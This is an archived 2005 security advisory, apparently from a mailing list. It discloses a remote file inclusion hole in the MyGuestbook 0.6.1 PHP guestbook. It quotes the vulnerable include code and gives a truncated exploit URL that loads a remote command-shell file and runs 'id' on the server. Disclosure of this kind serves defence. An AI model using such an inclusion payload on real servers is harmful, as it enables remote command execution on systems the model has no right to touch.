Remote File Inclusion in MyGuestbook

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 


Remote File Inclusion in MyGuestbook

Date: 10/07/2005

Severity: High

version: 0.6.1

The bug reside in form.inc.php3

The Vulnerable Code




if ($show < 1) {
include ("form.inc.php3");
}


Exploit :

http://server/Guestbook/form.inc.ph...cmd.gif?&cmd=id


Discovery by RoDheDoR

L-G-H Team

http://www.lezr.com

Best Regards

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux